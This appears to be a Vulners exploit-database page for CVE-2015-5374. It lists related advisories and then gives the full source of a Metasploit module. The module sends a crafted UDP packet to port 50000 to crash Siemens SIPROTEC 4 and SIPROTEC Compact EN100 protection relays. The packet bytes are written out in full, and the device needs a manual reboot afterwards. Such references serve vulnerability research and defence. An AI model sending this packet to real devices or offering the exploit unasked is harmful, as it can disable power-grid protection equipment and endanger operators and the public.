| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
| Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < 4.25 - Denial of Service Exploit | 17 Feb 201800:00 | – | zdt | |
| Siemens SIPROTEC DoS (SCADA) | 13 Jun 201700:00 | – | nessus | |
| Siemens Siprotec Unspecified Vulnerability | 8 Nov 201900:00 | – | nessus | |
| Siemens EN100 Ethernet module & SIPROTEC Merging Unit Denial of Service (CVE-2015-5374) | 7 Feb 202200:00 | – | nessus | |
| CVE-2015-5374 | 12 Jun 201713:54 | – | circl | |
| Siemens SIPROTEC 4 Denial of Service Vulnerability | 20 Jul 201500:00 | – | cnvd | |
| Siemens SIPROTEC Denial of Service (CVE-2015-5374) | 14 Jun 201700:00 | – | checkpoint_advisories | |
| CVE-2015-5374 | 18 Jul 201510:00 | – | cve | |
| CVE-2015-5374 | 18 Jul 201510:00 | – | cvelist | |
| InduGuard_vul_poc | 19 Apr 202605:53 | – | githubexploit |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(
'Name' => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service',
'Description' => %q{
This module sends a specially crafted packet to port 50000/UDP
causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.
A manual reboot is required to return the device to service.
CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.
},
'Author' => [ 'M. Can Kurnaz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'CVE' '2015-5374' ],
[ 'EDB', '44103' ],
[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-15-202-01' ]
])
register_options([Opt::RPORT(50000),])
end
def run
connect_udp
pckt = "\x11\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x9e"
print_status('Sending DoS packet...')
udp_sock.put(pckt)
disconnect_udp
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation